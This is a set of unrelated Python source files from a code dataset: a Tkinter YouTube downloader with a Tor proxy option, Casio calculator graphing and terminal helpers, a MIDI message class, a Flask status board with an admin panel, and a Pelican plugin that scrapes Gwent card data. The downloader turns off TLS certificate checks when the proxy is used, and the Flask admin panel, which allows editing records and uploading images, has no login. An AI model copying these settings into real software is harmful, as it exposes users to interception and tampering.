"^(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?.*?(?:v|list)=(.*?)(?:&|$)|^(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?(?:(?!=).)*\/(.*)$"
)
################################# PROGRESS BAR ##################################################################
# def create_toplevel_tk_window(label_text=None):
# global TOPLEVEL_WINDOW
# newWindow = tk.Toplevel()
# newWindow.title("Downloading...")
# newWindow.geometry("275x125")
# if label_text:
# label = tk.Label(master=newWindow, text=label_text, wraplength=newWindow.winfo_width())
# label.pack(padx=0,pady=0)
# TOPLEVEL_WINDOW = newWindow
# def show_progress(data):
# global TOPLEVEL_WINDOW
# try:
# # creating progress bar
# progress_bar = Progressbar(TOPLEVEL_WINDOW, length=250, s='black.Horizontal.TProgressbar')
# progress_bar['value'] = 0
# progress_bar.pack(padx=5, pady=25)
# if data['status'] == 'finished':
# progress_bar['value'] = 100
# if TOPLEVEL_WINDOW:
# TOPLEVEL_WINDOW.destroy()
# TOPLEVEL_WINDOW = None
# if data['status'] == 'downloading':
# p = data['_percent_str']
# p = p.replace('%', '')
# progress_bar['value'] = float(p)
# except Exception:
# show_error_message(UNEXPCTED_ERR_MSG)
# logging.exception(UNEXPCTED_ERR_MSG)
# if TOPLEVEL_WINDOW:
# TOPLEVEL_WINDOW.destroy()
# TOPLEVEL_WINDOW = None
###################################################################################################
##################################### UTILITIES #########################
def read_youtube_urls():
"""
Required format that the txt file containing the youtube urls must have:
url_1
url_2
.
.
.
url_n
:param filepath:
:return:
"""
yt_urls = []
file_to_read = askopenfile(mode="r", filetypes=[("Text file", "*.txt")])
if file_to_read is not None:
while True:
curr_url = file_to_read.readline()
cleaned_curr_url = curr_url.strip().rstrip("\n").strip("\r").strip("\t")
if not curr_url:
break
if not cleaned_curr_url:
continue
if YOUTUBE_URL_REGEX.findall(cleaned_curr_url):
yt_urls.append(cleaned_curr_url)
else:
show_error_message(
f'"{cleaned_curr_url}" IS NOT A VALID YOUTUBE URL. SKIPPED.'
)
return yt_urls
def select_download_dir():
global TB_DESTINATION_PATH
download_dir = askdirectory()
if TB_DESTINATION_PATH and download_dir:
TB_DESTINATION_PATH["state"] = tk.NORMAL
TB_DESTINATION_PATH.delete(0, tk.END)
TB_DESTINATION_PATH.insert(0, download_dir)
TB_DESTINATION_PATH["state"] = tk.DISABLED
###########################################################################
########################### THREADS ###################################
def convert_multiple_youtube_to_mp3():
t = threading.Thread(target=start_convert_multiple_youtube_to_mp3, args=())
t.start()
threads.append(t)
def convert_video_to_mp3():
t_d = threading.Thread(target=start_download, args=())
t_d.start()
threads.append(t_d)
#######################################################################
################################## PROXY STUFF ##########################
# def get_random_ua():
# # if file can be loaded in memory use: random.choice(open("useragents.txt").readlines())
# # Waterman's "Reservoir Algorithm" to get 1 line from file randomly in memory efficient way
# with open('useragents.txt') as f:
# line = next(f)
# for num, aline in enumerate(f, 2):
# if random.randrange(num):
# continue
# line = aline
# return line
def get_proxy():
# TODO: get random proxy if tor is not working
return TOR_HANDLER.socks5_url
##################################################################################
##################### YOUTUBE-DL YOUTUBE TO MP3 CONVERSION FOR GETTING VIDEO INFO AND OPTIONS THAT YOUTUBE-DL NEEDS ############
def get_available_formats(vids_info):
"""
Returns list of tuples of mp4 video formats in string representation and corresponding format_id
(excluding audio formats as the best is always chosen by default)
Args:
vids_info (list): the youtube info from the given video that needs to be downloaded
"""
formats = vids_info.get("formats", [vids_info])
available_formats_list = []
for f in formats:
if (
"audio" not in f["format"]
and f["ext"] == "mp4"
and "DASH" not in f["format"]
):
f_str = f"{f['ext']} - {f['format']}"
f_id = f["format_id"]
available_formats_list.append((f_id, f_str))
return available_formats_list
def get_vid_info(vid_url):
with youtube_dl.YoutubeDL() as ydl:
vid_info = ydl.extract_info(url=vid_url, download=False)
return vid_info
def get_video_options(
vid_dest: str,
conversion_mode: str,
video_quality_id: str = None
# progress_bar = True
):
global USING_PROXY
vid_name = "%(title)s.%(ext)s"
if conversion_mode == "mp3":
youtube_dl_options = {
"format": "bestaudio/best",
"outtmpl": path.join(vid_dest, vid_name),
"keepvideo": False,
"quiet": True,
# 'prefer_ffmpeg': True, # --> optional
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "mp3",
"preferredquality": "192",
}
],
}
else:
        # if no format is specified, youtube_dl will download the best audio with 480p video quality
        # NOTE: if youtube_dl can't combine the audio with the specified mp4 format, it will convert
        # to mkv instead, with the given video quality and best audio
if not video_quality_id:
f = "bestvideo[height<=480]+bestaudio/best[height<=480]"
else:
f = f"{video_quality_id}+bestaudio"
youtube_dl_options = {
"format": f,
"outtmpl": path.join(vid_dest, vid_name),
"quiet": True,
}
if USING_PROXY:
proxy = get_proxy()
if proxy:
youtube_dl_options["proxy"] = proxy
youtube_dl_options["nocheckcertificate"] = True
# if progress_bar:
# youtube_dl_options['progress_hooks'] = [show_progress]
return youtube_dl_options
################################################################################################################################
########################################## HANDLING ERROR MESSAGES AND CHECK FOR YOUTUBE URL VALIDITY #####################
def show_info_message(msg, title="Information"):
messagebox.showinfo(title, msg)
def show_error_message(msg, title="Error"):
messagebox.showerror(title, msg)
def url_check(url):
if url == "":
show_error_message("Youtube URL not provided!")
return False
elif url is None:
show_error_message("Unknown Youtube URL!")
return False
elif not YOUTUBE_URL_REGEX.findall(url):
show_error_message("Please provide a valid Youtube URL!")
return False
else:
return True
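# Quick behaviour sketch of url_check (URLs are illustrative):
#
#   url_check("")                                    -> error dialog, returns False
#   url_check("https://www.youtube.com/watch?v=xyz") -> returns True
#   url_check("https://example.com/video")           -> error dialog, returns False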
##############################################################################################
###################################### HANDLING SELECTION QUALITY OF VIDEO ###################
def select_video_quality(vids_info: list) -> str:
"""Returns the format id of the selected format from the available formats
Args:
vids_info (dict): info about video to download
Returns:
format_id: the selected format id, otherwise empty string '' is returned
"""
global root
available_formats = get_available_formats(vids_info)
return VideoQualitySelector(root, available_formats, vids_info["title"]).show()
##############################################################################################
########################################## BUTTONS TOGGLES ###################################
def toggle_download_btns_state():
global BTN_START_DOWNLOAD, BTN_DOWNLOAD_FROM_TXT
if BTN_START_DOWNLOAD:
if BTN_START_DOWNLOAD["state"] == tk.NORMAL:
BTN_START_DOWNLOAD["state"] = tk.DISABLED
else:
BTN_START_DOWNLOAD["state"] = tk.NORMAL
if BTN_DOWNLOAD_FROM_TXT:
if BTN_DOWNLOAD_FROM_TXT["state"] == tk.NORMAL:
BTN_DOWNLOAD_FROM_TXT["state"] = tk.DISABLED
else:
BTN_DOWNLOAD_FROM_TXT["state"] = tk.NORMAL
##############################################################################################
##################################### HANDLE SINGLE URL DOWNLOAD AND MULTIPLE URLS DOWNLOADS LOGIC ###############
def start_convert_multiple_youtube_to_mp3():
global CONVERSION_MODE
try:
vids_dest = get_download_destination_path()
urls_to_download = read_youtube_urls()
# only continue when there are urls to download
if not urls_to_download:
return
# disable both download btn and btn of download from txt file
toggle_download_btns_state()
vids_info = []
for yt_url in urls_to_download:
vids_info.append(get_vid_info(yt_url))
vids_options = get_video_options(vids_dest, CONVERSION_MODE)
# start downloading and converting the given youtube videos to mp3
with youtube_dl.YoutubeDL(vids_options) as ydl:
for vid_info in vids_info:
# create toplevel window to show download progress for each download
with ToplevelManager(label_text=f'Downloading {vid_info["title"]} ...'):
# create_toplevel_tk_window(vid_info['title'])
ydl.download([vid_info["webpage_url"]])
toggle_download_btns_state()
show_info_message(
f"MP3 files downloaded successfully!",
"THE MP3 FILES HAVE BEEN DOWNLOADED SUCCESSFULLY!",
)
except Exception as e:
show_error_message(UNEXPCTED_ERR_MSG)
logging.exception(UNEXPCTED_ERR_MSG)
toggle_download_btns_state()
def start_download():
global CONVERSION_MODE
try:
vid_url = get_url_from_textbox()
vid_dest = get_download_destination_path()
if url_check(vid_url) is False:
return
toggle_download_btns_state()
vids_info = get_vid_info(vid_url)
# if link consists of multiple videos (playlist) then vids_info contains 'entries'
# otherwise there is 1 video
if "entries" in vids_info:
list_vids_options = [] # in case playlist of vids need to be downloaded
vids_options = None # in case playlist of mp3 need to be downloaded
if CONVERSION_MODE == "mp3":
vids_options = get_video_options(
vid_dest,
CONVERSION_MODE
# progress_bar=False
)
else:
list_selected_video_format = []
for idx, vid in enumerate(vids_info["entries"]):
selected_video_format = select_video_quality(vid)
                    # if no video format has been chosen, just abort the download
if not selected_video_format:
toggle_download_btns_state()
return
vid_opt = get_video_options(
vid_dest,
CONVERSION_MODE,
video_quality_id=selected_video_format
# progress_bar=False
)
list_vids_options.append(vid_opt)
if list_vids_options:
for vid_opt in list_vids_options:
with youtube_dl.YoutubeDL(vid_opt) as ydl:
ydl.download([vids_info["webpage_url"]])
else:
with youtube_dl.YoutubeDL(vids_options) as ydl:
ydl.download([vids_info["webpage_url"]])
else:
with ToplevelManager(label_text=f"Downloading {vids_info['title']} ..."):
if CONVERSION_MODE == "mp3":
vids_options = get_video_options(vid_dest, CONVERSION_MODE)
else:
selected_video_format = select_video_quality(vids_info)
                    # if no video format has been chosen, just abort the download
if not selected_video_format:
toggle_download_btns_state()
return
vids_options = get_video_options(
vid_dest,
CONVERSION_MODE,
video_quality_id=selected_video_format,
)
# create_toplevel_tk_window(vids_info['title'])
with youtube_dl.YoutubeDL(vids_options) as ydl:
ydl.download([vids_info["webpage_url"]])
toggle_download_btns_state()
if "entries" in vids_info:
show_info_message(
f'Playlist {vids_info["title"]} downloaded successfully!',
"PLAYLIST DOWNLOADED SUCCESSFULLY!",
)
else:
show_info_message(
f'MP3 file {vids_info["title"]} downloaded successfully!',
"THE MP3 FILE HAS BEEN DOWNLOADED SUCCESSFULLY!",
)
except Exception as e:
show_error_message(UNEXPCTED_ERR_MSG)
logging.exception(UNEXPCTED_ERR_MSG)
toggle_download_btns_state()
def handle_proxy_btn():
global PROXY_BUTTON, USING_PROXY, TOR_PROXY_CHECKED
if PROXY_BUTTON:
if PROXY_BUTTON.config("text")[-1] == "Currently NOT using proxy":
TOR_PROXY_CHECKED += 1
can_connect_to_tor = False
if (
TOR_PROXY_CHECKED % 5 == 0
): # check TOR connection after every 5 clicks on the button
try:
(
can_connect_to_tor,
ip,
tor_ip,
) = TOR_HANDLER.test_tor_proxy_connection()
except Exception:
show_error_message(UNEXPCTED_ERR_MSG)
logging.error(UNEXPCTED_ERR_MSG)
return
if can_connect_to_tor:
show_info_message(
f"Testing TOR Proxy\nYour IP:\n{ip}\nTor IP:\n{tor_ip}\nTor IP working correctly!"
)
PROXY_BUTTON.config(text="Currently using TOR proxy")
USING_PROXY = True
else:
show_info_message(
"Your IP and Tor IP are the same: check whether you are running tor from commandline"
)
else:
PROXY_BUTTON.config(text="Currently NOT using proxy")
USING_PROXY = False
def toggle_download_mode():
global CONVERSION_MODE_BTN, CONVERSION_MODE
if CONVERSION_MODE_BTN:
if CONVERSION_MODE_BTN.config("text")[-1] == "Current conversion mode: mp3":
CONVERSION_MODE_BTN.config(text="Current conversion mode: mp4")
CONVERSION_MODE = "mp4"
else:
CONVERSION_MODE_BTN.config(text="Current conversion mode: mp3")
CONVERSION_MODE = "mp3"
##########################################################################################
###################################### WIDGETS CREATION (Buttons and Textboxes) #####################
def create_root_buttons():
global root, BTN_START_DOWNLOAD, BTN_SELECT_DIR, BTN_DOWNLOAD_FROM_TXT, PROXY_BUTTON, CONVERSION_MODE_BTN
PROXY_BUTTON = tk.Button(
master=root, text="Currently NOT using proxy", command=handle_proxy_btn
)
CONVERSION_MODE_BTN = tk.Button(
master=root, text="Current conversion mode: mp3", command=toggle_download_mode
)
BTN_START_DOWNLOAD = tk.Button(
master=root,
text="Start download",
width=25,
height=5,
command=convert_video_to_mp3,
)
BTN_SELECT_DIR = tk.Button(
master=root,
text="Select download directory",
width=25,
height=5,
command=select_download_dir,
)
BTN_DOWNLOAD_FROM_TXT = tk.Button(
master=root,
text="Convert multiple youtube videos",
width=25,
height=5,
command=convert_multiple_youtube_to_mp3,
)
BTN_START_DOWNLOAD.pack(pady=5)
BTN_SELECT_DIR.pack(pady=5)
BTN_DOWNLOAD_FROM_TXT.pack(pady=5)
PROXY_BUTTON.pack(pady=5)
CONVERSION_MODE_BTN.pack(pady=5)
def create_root_textboxes():
global TB_URL, TB_DESTINATION_PATH
# create url label and textbox
url_label = tk.Label(text="Youtube Video URL (required)")
TB_URL = tk.Entry(width=80)
url_label.pack()
TB_URL.pack()
# create destination label and textbox
destination_label = tk.Label(
text="Destination path (where to download the video/mp3)."
)
TB_DESTINATION_PATH = tk.Entry(state=tk.NORMAL, width=80)
    # insert the current directory for the user for convenience
TB_DESTINATION_PATH.insert(0, CURRENT_SCRIPT_PATH)
TB_DESTINATION_PATH["state"] = tk.DISABLED
destination_label.pack()
TB_DESTINATION_PATH.pack()
###############################################################################################
########################################## GETTERS ##########################################
def get_url_from_textbox():
return TB_URL.get().strip()
def get_download_destination_path():
dest = TB_DESTINATION_PATH.get().strip()
# if destination textbox is left empty, then just default to current directory of the script
if dest == "" or dest is None:
return CURRENT_SCRIPT_PATH
return TB_DESTINATION_PATH.get()
##############################################################################################
########################################## SHOW RIGHT CLICK MENU ###############################
def right_click_menu():
global root, RIGHT_CLICK_MENU
if root:
RIGHT_CLICK_MENU = Menu(root, tearoff=0)
RIGHT_CLICK_MENU.add_command(
label="Cut", command=lambda: root.focus_get().event_generate("<<Cut>>")
)
RIGHT_CLICK_MENU.add_command(
label="Copy", command=lambda: root.focus_get().event_generate("<<Copy>>")
)
RIGHT_CLICK_MENU.add_command(
label="Paste", command=lambda: root.focus_get().event_generate("<<Paste>>")
)
root.bind("<Button-3>", right_click_handler)
def right_click_handler(event):
global RIGHT_CLICK_MENU
try:
RIGHT_CLICK_MENU.tk_popup(event.x_root, event.y_root)
finally:
RIGHT_CLICK_MENU.grab_release()
##############################################################################################
#################################### HANDLE CLOSING OF TKINTER WINDOW ######################
def exit_handler():
global threads, root
for t in threads:
if not t.is_alive():
t.handled = True
else:
t.handled = False
threads = [t for t in threads if not t.handled]
if not threads:
root.destroy()
##############################################################################################
########################################## MAIN GUI ##########################################
def init_tkinter_root(size):
global root
root = tk.Tk()
root.protocol("WM_DELETE_WINDOW", exit_handler)
root.wm_iconbitmap("logo.ico")
root.title("Youtube to MP3")
root.geometry(size)
root.minsize(400, 350)
root.maxsize(1000, 600)
root.grid_rowconfigure(0, weight=1)
root.grid_columnconfigure(0, weight=1)
# Add widgets
create_root_textboxes()
create_root_buttons()
right_click_menu()
root.mainloop()
def main(size_width=575, size_height=475):
global TOR_HANDLER
TOR_HANDLER = TorHandler() # init tor handler object
init_tkinter_root(f"{size_width}x{size_height}")
if __name__ == "__main__":
main()
``` |
{
"source": "4dc5/casio_graph",
"score": 3
} |
#### File: 4dc5/casio_graph/demo.py
```python
from graph import *
def func(x):
return sin(x)+sin(3*x)/3
g=Graph()
g.graph(func,xmin=-20,xmax=20)
```
#### File: 4dc5/casio_graph/graph.py
```python
from casioplot import *
from math import *
# Draw a graph.
#
# To use it, do this:
#
# from graph import *
#
# def func(x):
# return sin(x)+sin(3*x)/3
#
# g=Graph()
# g.graph(func,xmin=-20,xmax=20)
class Graph:
def graph(self,fn,xmin=-5.0,xmax=5.0,color=(0,0,0)):
# Lists of x values and y values
xl=[]
yl=[]
# Set graph edges
sxmin=20 # Left
sxmax=383 # Right
symin=0 # Top
symax=171 # Bottom
sxrange=sxmax-sxmin
syvrange=symax-symin
# Evaluate function for every x pixel
for i in range(0,sxrange+1):
x=i/sxrange * (xmax-xmin) + xmin
xl.append(x)
y=fn(x)
yl.append(y)
# Update min and max y values
if i==0:
ymin=y
ymax=y
if y<ymin:
ymin=y
if y>ymax:
ymax=y
# Edge case: if it's just constant y, make min and max y different
if ymin==ymax:
ymin-=1
ymax+=1
# Add a margin to top and bottom
ymid=(ymin+ymax)/2
ymax=(ymax-ymid)*1.05+ymid
ymin=(ymin-ymid)*1.05+ymid
yvrange=ymax-ymin
xvrange=xmax-xmin
# Draw vertical grid lines, using a heuristic to work out the intervals
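        # Worked example: for xmin=-20, xmax=20 the x range is 40, so
        # expt = floor(log10(40)) = 1 and the grid lines land on multiples
        # of 10**1, i.e. at -20, -10, 0, 10 and 20.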
expt=floor(log10(xvrange))
ex1=floor(xmin/10**expt)
ex2=ceil(xmax/10**expt)
for ex in range(ex1,ex2+1):
x=ex*10**expt
sx=int((x-xmin)/(xvrange)*sxrange)
for sy in range(0,(syvrange+1)):
set_pixel(sx+sxmin,sy,(127,127,127))
draw_string(sx+sxmin,175,str(x))
# Draw horizontal grid lines, using a heuristic to work out the intervals
expt=floor(log10(yvrange))
ex1=floor(ymin/10**expt)
ex2=ceil(ymax/10**expt)
for ex in range(ex1,ex2+1):
y=ex*10**expt
sy=int(syvrange-(y-ymin)/(yvrange)*syvrange)
for sx in range(0,(sxrange+1)):
set_pixel(sx+sxmin,sy,(127,127,127))
draw_string(0,sy,str(y))
# Plot the graph
for sx in range(1,(sxrange+1)):
# Calculate previous and current y values
sy1=int(syvrange-(yl[sx-1]-ymin)/(yvrange)*syvrange)
sy2=int(syvrange-(yl[sx]-ymin)/(yvrange)*syvrange)
# Set step depending on whether curve is going up or down
if sy1>sy2:
st=-1
else:
st=1
# Draw vertical line from previous y to current y (so we don't have gaps)
for sy in range(sy1,sy2+st,st):
self._point(sx+sxmin,sy,color)
show_screen()
# Draw a thick point
def _point(self,x,y,color=(0,0,0)):
set_pixel(x,y,color)
set_pixel(x-1,y,color)
set_pixel(x,y-1,color)
set_pixel(x+1,y,color)
set_pixel(x,y+1,color)
``` |
{
"source": "4dc5/casio_terminal",
"score": 4
} |
#### File: 4dc5/casio_terminal/terminal.py
```python
from casioplot import *
# Make a configurable display environment for the Casio fx-CG50.
#
# To use, do this in your file:
# from terminal import *
# term=Terminal()
# term.xprint("String to display")
#
# For different colors, try for example:
# term=Terminal(bg=(0,255,255),fg=(255,0,0))
class Terminal:
# Default to black background and green foreground. Set bg and/or fg to change this.
def __init__(self,bg=(0,0,0),fg=(0,255,0)):
self.scr=[] # The screen buffer
self.bg=bg
self.fg=fg
self.rows=11 # Text rows
self.cols=34 # Text columns
self.clear()
# Clear the screen.
def clear(self):
# We print the letter 'T' all over the screen. Do it as little as possible, for speed.
for y in range(0,189,3):
for x in range(0,3):
draw_string(x,y,"T"*32,self.bg)
# We missed some pixels at the bottom of the screen, so fill them in now.
for x in range(0,3):
draw_string(x,189,"T"*32,self.bg)
# Refresh the screen with whatever we have in the buffer.
def refresh(self):
self.clear()
# We only want the number of rows we can fit on the screen, so truncate the buffer.
self.scr=self.scr[-self.rows:]
# Write the buffer rows to the screen.
y=0
for r in self.scr:
draw_string(5,8+y*16,r,self.fg)
y+=1
show_screen()
# Print a string on the screen.
def xprint(self,s):
s=str(s)
self.scr.extend(self._lines(s))
self.refresh()
# Split a string into a number of lines that will fit within the screen width.
def _lines(self,s):
r=[]
while len(s)>self.cols:
r.append(s[:self.cols])
s=s[-(len(s)-self.cols):]
if len(s)>0:
r.append(s)
return r
``` |
{
"source": "4dcu-be/Adafruit_CircuitPython_MIDI",
"score": 2
} |
#### File: Adafruit_CircuitPython_MIDI/adafruit_midi/control_change.py
```python
from .midi_message import MIDIMessage
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_MIDI.git"
class ControlChange(MIDIMessage):
"""Control Change MIDI message.
:param int control: The control number, 0-127.
:param int value: The 7bit value of the control, 0-127.
"""
_STATUS = 0xB0
_STATUSMASK = 0xF0
LENGTH = 3
def __init__(self, control, value, *, channel=None):
self.control = control
self.value = value
super().__init__(channel=channel)
if not 0 <= self.control <= 127 or not 0 <= self.value <= 127:
raise self._EX_VALUEERROR_OOR
def __bytes__(self):
return bytes(
[self._STATUS | (self.channel & self.CHANNELMASK), self.control, self.value]
)
@classmethod
def from_bytes(cls, msg_bytes):
return cls(msg_bytes[1], msg_bytes[2], channel=msg_bytes[0] & cls.CHANNELMASK)
ControlChange.register_message_type()
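# Illustrative serialisation (added sketch; assumes CHANNELMASK keeps the low
# nibble as in the MIDIMessage base class):
#
#   msg = ControlChange(7, 100, channel=0)   # CC#7 (volume) = 100 on channel 0
#   bytes(msg)                               # -> b'\xb0\x07\x64'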
``` |
{
"source": "4dcu-be/BusyBoard2",
"score": 2
} |
#### File: BusyBoard2/busyboard/admin.py
```python
from flask import redirect, url_for
from flask_admin.contrib.sqla import ModelView
from flask_admin import form
from jinja2 import Markup
from flask_admin import expose, AdminIndexView
def _list_thumbnail(view, context, model, name):
if not model.filename:
return ''
return Markup(
'<img src="{model.url}" style="width: 150px;">'.format(model=model)
)
class UserAdminView(ModelView):
form_columns = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes', 'path')
form_excluded_columns = ('last_updated')
column_editable_list = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes')
form_create_rules = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes', 'path')
form_edit_rules = ('name', 'busy', 'busy_with', 'can_be_disturbed', 'notes', 'path')
can_create = True
column_formatters = {
'image': _list_thumbnail
}
form_extra_fields = {
'path': form.ImageUploadField(
'Image',
base_path='busyboard/static/images',
url_relative_path='images/',
)
}
class CustomIndexView(AdminIndexView):
def is_visible(self):
# This view won't appear in the menu structure
return False
@expose('/')
def index(self):
return redirect(url_for('main_route'))
```
#### File: BusyBoard2/busyboard/__init__.py
```python
import os
from flask import Flask, render_template, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_admin import Admin
from busyboard.admin import UserAdminView, CustomIndexView
from flask_uploads import UploadSet, IMAGES, configure_uploads, patch_request_class
db = SQLAlchemy()
images = UploadSet('images', IMAGES)
def create_app(config):
# Set up app, database and login manager before importing models and controllers
# Important for db_create script
app = Flask(__name__)
app.config.from_object(config)
db.app = app
db.init_app(app)
configure_uploads(app, (images))
patch_request_class(app, 16 * 1024 * 1024)
from busyboard.models import User
admin = Admin(app, name='BusyBoard', template_mode='bootstrap3', index_view=CustomIndexView())
admin.add_view(UserAdminView(User, db.session, endpoint='users'))
@app.route('/')
def main_route():
users = User.query.all()
return render_template('index.html', users=users)
@app.route('/api/users')
@app.route('/api/users/')
def api_users():
users = User.query.all()
return jsonify(list([u.to_dict() for u in users]))
@app.route('/api/users/<int:user_id>')
def api_user(user_id: int):
user = User.query.get(user_id)
return jsonify(user.to_dict())
@app.cli.command()
def createdb():
"""
function to create the initial database and migration information
"""
SQLALCHEMY_DATABASE_URI = app.config['SQLALCHEMY_DATABASE_URI']
if SQLALCHEMY_DATABASE_URI.startswith('sqlite:///'):
path = os.path.dirname(os.path.realpath(SQLALCHEMY_DATABASE_URI.replace('sqlite:///', '')))
if not os.path.exists(path):
os.makedirs(path)
db.create_all(app=app)
return app
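# Minimal usage sketch (assumes a config object/module exposing the usual Flask
# and SQLAlchemy settings such as SQLALCHEMY_DATABASE_URI; names are illustrative):
#
#   app = create_app('config.DevConfig')
#   app.run(debug=True)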
``` |
{
"source": "4dcu-be/DeckLock",
"score": 2
} |
#### File: plugins/gwent/reader.py
```python
from pelican import signals
from pelican.readers import BaseReader
import json
import os
from pathlib import Path
from urllib.parse import urlparse
from bs4 import BeautifulSoup
import requests
from time import sleep
import posixpath
from plugins.utils import fetch_image, get_last_modified
from pelican.utils import slugify
from itertools import accumulate
def get_local_card_img_path(assets_cards_path, url):
img_filename = Path(urlparse(url).path).name
return posixpath.join(assets_cards_path, img_filename)
def parse_meta(line):
stripped_line = line.lstrip("//").strip()
tag, value = [p.strip() for p in stripped_line.split(":")]
return tag, value
def parse_card_line(line):
card_count, card_name = line.strip().split(" ", 1)
return int(card_count), card_name
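# Illustrative examples of the two deck-file line formats handled above
# (card name and value invented for demonstration):
#
#   parse_meta("// Name: Lockdown Control")  ->  ("Name", "Lockdown Control")
#   parse_card_line("2 Imperial Formation")  ->  (2, "Imperial Formation")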
def parse_card_data(card_data, card_name):
soup = BeautifulSoup(card_data, "html.parser")
index = -1
results = []
# In case there are multiple results find exact match
for ix, result in enumerate(soup.find_all("div", class_="card-name")):
results.append(result)
# This character is a problem with utf-8 encoding
# TODO: Work out a better solution or encoding to avoid this
if card_name.lower() == str(result.text.replace("É", "E")).lower():
index = ix
if index < 0:
print(f"ERROR: {card_name} not found in {results}!")
quit()
card_attributes = soup.find_all("div", class_="card-wrap card-data")[index]
card_name = soup.find_all("div", class_="card-name")[index]
card_category = soup.find_all("div", class_="card-category")[index]
card_body_ability = soup.find_all("div", class_="card-body-ability")[index]
image_url = "https://gwent.one/image/gwent/assets/card/art/medium/%d.jpg" % int(
card_attributes.get("data-artid").replace("j", "")
)
output = {
"name": card_name.text,
"art_id": card_attributes.get("data-artid"),
"power": card_attributes.get("data-power"),
"armor": card_attributes.get("data-armor"),
"provision": int(card_attributes.get("data-provision")),
"faction": card_attributes.get("data-faction"),
"color": card_attributes.get("data-color"),
"type": card_attributes.get("data-type"),
"rarity": card_attributes.get("data-rarity"),
"category": card_category.text,
"body_ability": card_body_ability.text,
"body_ability_html": str(card_body_ability),
"image_url": image_url,
}
return output
def get_card_data(card_name, card_version, sleep_time=0.1):
gwent_one_endpoint = "https://gwent.one/search/abilities"
post_data = {
"q": card_name,
"version": card_version,
"Token": 1,
"view": "sCard",
"language": "en",
}
r = requests.post(gwent_one_endpoint, data=post_data)
sleep(sleep_time)
return parse_card_data(r.text, card_name)
def parse_card_type(type_line):
if " — " in type_line:
p = type_line.split(" — ")[0]
else:
p = type_line
parts = p.split()
return parts[-1].lower()
class GwentReader(BaseReader):
enabled = True
file_extensions = ["gwent"]
def __init__(self, settings):
super(GwentReader, self).__init__(settings)
self.cached_data = {}
if os.path.exists(self.gwent_data_path):
with open(self.gwent_data_path, "r") as fin:
self.cached_data = json.load(fin)
Path(self.gwent_assets_cards_path(full=True)).mkdir(parents=True, exist_ok=True)
@property
def gwent_data_path(self):
Path(self.settings.get("PATH"), self.settings.get("DECKLOCK_CACHE")).mkdir(
parents=True, exist_ok=True
)
return posixpath.join(
self.settings.get("PATH"),
self.settings.get("DECKLOCK_CACHE"),
"gwent.cached_cards.json",
)
def write_cache(self):
with open(self.gwent_data_path, "w") as fout:
json.dump(
self.cached_data, fout, sort_keys=True, indent=4, separators=(",", ": ")
)
def gwent_assets_cards_path(self, full=False):
if full:
return posixpath.join(
self.settings.get("PATH"),
self.settings.get("GWENT_ASSETS_PATH"),
"cards",
)
else:
return posixpath.join(self.settings.get("GWENT_ASSETS_PATH"), "cards")
def add_card_data(self, card_name, card_version):
if card_version not in self.cached_data.keys():
self.cached_data[card_version] = {}
if card_name not in self.cached_data[card_version].keys():
card_data = get_card_data(card_name, card_version)
self.cached_data[card_version][card_name] = card_data
else:
card_data = self.cached_data[card_version][card_name]
try:
img_url = card_data["image_url"]
local_path = get_local_card_img_path(
self.gwent_assets_cards_path(full=False), img_url
)
self.cached_data[card_version][card_name]["image_path"] = local_path
local_path_full = get_local_card_img_path(
self.gwent_assets_cards_path(full=True), img_url
)
if not self.settings.get("USE_EXTERNAL_LINKS"):
fetch_image(img_url, local_path_full)
except Exception as e:
print(f"an error occurred fetching {card_name} from version {card_version}")
print(e)
def read(self, filename):
metadata = {
"category": "Gwent_Deck",
"date": get_last_modified(filename),
"template": "gwent_deck",
}
deck_data = []
description = []
leader = None
stratagem = None
with open(filename, "r", encoding="utf-8") as fin:
for line in fin:
if line.startswith("//"):
tag, value = parse_meta(line)
metadata[tag.lower()] = value
elif line.startswith("---"):
# This is the description, read until end of file
for dl in fin:
description.append(dl.strip())
elif line.strip() != "":
card_count, card_name = parse_card_line(line)
card_version = metadata["gwent_version"]
self.add_card_data(card_name, card_version)
card_data = {
"name": card_name,
"count": card_count,
"data": self.cached_data[card_version][card_name],
}
if (
self.cached_data[card_version][card_name]["category"]
== "Leader"
):
leader = card_data
elif (
self.cached_data[card_version][card_name]["type"] == "stratagem"
):
stratagem = card_data
else:
deck_data.append(card_data)
self.write_cache()
print(
f"Adding Gwent {metadata['name']} (Gwent version {metadata['gwent_version']})"
)
metadata["title"] = metadata["name"]
metadata["slug"] = slugify(
metadata["title"] + "_" + metadata["gwent_version"],
regex_subs=self.settings.get("SLUG_REGEX_SUBSTITUTIONS", []),
)
metadata["description"] = "\n".join(description)
metadata["url"] = f"gwent/{metadata['gwent_version']}/{metadata['slug']}/"
metadata["save_as"] = f"{metadata['url']}index.html"
parsed = {
"provisions": 0,
"units": 0,
"scraps": 0,
"cards": sum([c["count"] for c in deck_data]),
}
for card in deck_data + [stratagem]:
parsed["provisions"] += card["data"]["provision"] * card["count"]
if card["data"]["type"] == "unit":
parsed["units"] += card["count"]
if card["data"]["rarity"] == "legendary":
parsed["scraps"] += 800 * card["count"]
elif card["data"]["rarity"] == "epic":
parsed["scraps"] += 200 * card["count"]
elif card["data"]["rarity"] == "rare":
parsed["scraps"] += 80 * card["count"]
else:
parsed["scraps"] += 30 * card["count"]
for key, value in metadata.items():
parsed[key] = self.process_metadata(key, value)
parsed["deck"] = deck_data
parsed["leader"] = leader
parsed["stratagem"] = stratagem
parsed["stats"] = {
"provisions": [],
"cumulative_provisions": [],
"card_colors": [],
"labels": [],
}
for card in sorted(deck_data, key=lambda x: x["data"]["provision"]):
for _ in range(card["count"]):
parsed["stats"]["provisions"].append(int(card["data"]["provision"]))
parsed["stats"]["card_colors"].append(card["data"]["color"])
parsed["stats"]["labels"].append(card["data"]["name"])
parsed["stats"]["cumulative_provisions"] = list(
accumulate(parsed["stats"]["provisions"])
)
return "", parsed
def add_reader(readers):
readers.reader_classes["gwent"] = GwentReader
def register():
signals.readers_init.connect(add_reader)
``` |
{
"source": "4dcu-be/WinstonCubeSim",
"score": 3
} |
#### File: 4dcu-be/WinstonCubeSim/main.py
```python
from cubedata import RichCubeData as CubeData
import click
@click.command()
